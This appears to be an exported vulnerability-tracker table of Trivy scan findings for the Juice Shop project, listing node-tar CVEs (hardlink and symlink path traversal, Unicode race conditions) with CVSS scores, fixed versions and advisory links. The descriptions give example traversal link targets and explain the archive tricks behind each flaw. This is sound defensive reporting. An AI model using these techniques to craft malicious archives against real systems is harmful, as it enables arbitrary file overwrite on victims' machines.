NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,f5ea7b3070fbaafc39f8219cc94627b72c3b534b472f2306332161b459a9b7a9,199,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.480615+00:00,,,,,0,[],7.5.4,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23950 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23950 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23950,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23950 Tar 4.4.19,False,False,,2026-05-12 17:37:05.480567+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23950,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.484326+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N,8.2,,,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.7 NEWLINE NEWLINE node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,b78954509e5a2b1f814397b776a31927a0736a3aa1ef831a04d733fce704cf78,200,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.484378+00:00,,,,,0,[],7.5.7,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24842 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24842 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24842,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-24842 Tar 4.4.19,False,False,,2026-05-12 17:37:05.484334+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24842,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.488242+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N,7.1,,,22,2026-05-12,,,"node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.8 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,c466c770f612fb7bc67d33f1be0b1d0d9d4f6215583ce50f5834f53d75906525,201,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.488298+00:00,,,,,0,[],7.5.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-26960 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384 NEWLINE https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26960 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26960,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26960 Tar 4.4.19,False,False,,2026-05-12 17:37:05.488251+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26960,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.492635+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L,8.2,22,2026-05-12,,,"node-tar: hardlink path traversal via drive-relative linkpath NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.10 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,8ba155d70f03e43895717ce0506387e72a16facb4009c3c984ec88bb51532d90,202,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.492721+00:00,,,,,0,[],7.5.10,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-29786 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-29786 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-29786,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-29786 Tar 4.4.19,False,False,,2026-05-12 17:37:05.492647+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-29786,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.496996+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N,8.2,22,2026-05-12,,,"tar: tar: File overwrite via drive-relative symlink traversal NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.11 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,e0c4122e23742970f005241bcab46e98095e8fccbe44f0880ee16db5333107c0,203,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.497054+00:00,,,,,0,[],7.5.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31802 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31802 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31802,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-31802 Tar 4.4.19,False,False,,2026-05-12 17:37:05.497005+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31802,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.504125+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N,8.2,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.3 NEWLINE NEWLINE node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,76cb194d7dc1b333dfa33d886d518de5e5f47410f30aebb9ccfdc7d9a9ce59f4,205,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.504180+00:00,,,,,0,[],7.5.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23745 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23745 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23745,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23745 Tar 6.2.1,False,False,,2026-05-12 17:37:05.504133+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23745,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.507771+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L,8.8,,,176,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.4 NEWLINE NEWLINE node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. 
This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,3686fce44e53e14bb2b6ef2aaa3c997e2c7a4a5ff362e5b35cef9413f97c5a9a,206,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.507824+00:00,,,,,0,[],7.5.4,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23950 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23950 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23950,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23950 Tar 6.2.1,False,False,,2026-05-12 17:37:05.507779+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23950,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.511751+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N,8.2,,,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.7 NEWLINE NEWLINE node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,405ecdd1ba8b164dd967703ca47586640f0f88ee956ac043901ea538988a6409,207,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.511811+00:00,,,,,0,[],7.5.7,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24842 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24842 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24842,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-24842 Tar 6.2.1,False,False,,2026-05-12 17:37:05.511761+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24842,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.515580+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N,7.1,,,22,2026-05-12,,,"node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.8 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,5dd11d12f1a19dbc8238c436f1e13578a511b1772c6121a23119b8731aad3137,208,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.515635+00:00,,,,,0,[],7.5.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-26960 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384 NEWLINE https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26960 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26960,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26960 Tar 6.2.1,False,False,,2026-05-12 17:37:05.515588+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26960,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.519128+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L,8.2,22,2026-05-12,,,"node-tar: hardlink path traversal via drive-relative linkpath NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.10 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,49418728710e54c2194c84fb7b3f945e6757fd3efdd34cea263134f3d4bd1753,209,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.519181+00:00,,,,,0,[],7.5.10,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-29786 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-29786 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-29786,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-29786 Tar 6.2.1,False,False,,2026-05-12 17:37:05.519136+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-29786,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.523283+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N,8.2,22,2026-05-12,,,"tar: tar: File overwrite via drive-relative symlink traversal NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.11 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,f6ff934f52f881818ddd9d914b34629551ab9f71d8c65d05d6872245cb5a44dd,210,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.523380+00:00,,,,,0,[],7.5.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31802 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31802 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31802,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-31802 Tar 6.2.1,False,False,,2026-05-12 17:37:05.523297+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31802,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.527738+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N,8.2,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.3 NEWLINE NEWLINE node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,4edfb999104b2188b8664ba285455d5be6ca1574859fb6243402b1ab38df8714,211,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.527804+00:00,,,,,0,[],7.5.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23745 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23745 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23745,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23745 Tar 7.4.3,False,False,,2026-05-12 17:37:05.527754+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23745,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.531506+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L,8.8,,,176,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.4 NEWLINE NEWLINE node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. 
This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,4b613a2e498cc3ab68331c96739669db90d4e453c6fbddf01deea46fd9a781d1,212,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.531560+00:00,,,,,0,[],7.5.4,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23950 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23950 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23950,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23950 Tar 7.4.3,False,False,,2026-05-12 17:37:05.531515+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23950,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.535166+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N,8.2,,,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.7 NEWLINE NEWLINE node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,18093086f89ff56df27fdcae95c9e49d5a1759bfeacd0d8ccf4e1dd3eaaefb3c,213,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.535218+00:00,,,,,0,[],7.5.7,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24842 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24842 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24842,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-24842 Tar 7.4.3,False,False,,2026-05-12 17:37:05.535173+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24842,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.538946+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N,7.1,,,22,2026-05-12,,,"node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.8 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,d15eabee3470437371b24482cf5f09aab81da810a559a1687f391a97e9008564,214,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.539002+00:00,,,,,0,[],7.5.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-26960 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384 NEWLINE https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26960 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26960,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26960 Tar 7.4.3,False,False,,2026-05-12 17:37:05.538954+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26960,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.542772+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L,8.2,22,2026-05-12,,,"node-tar: hardlink path traversal via drive-relative linkpath NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.10 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10. 
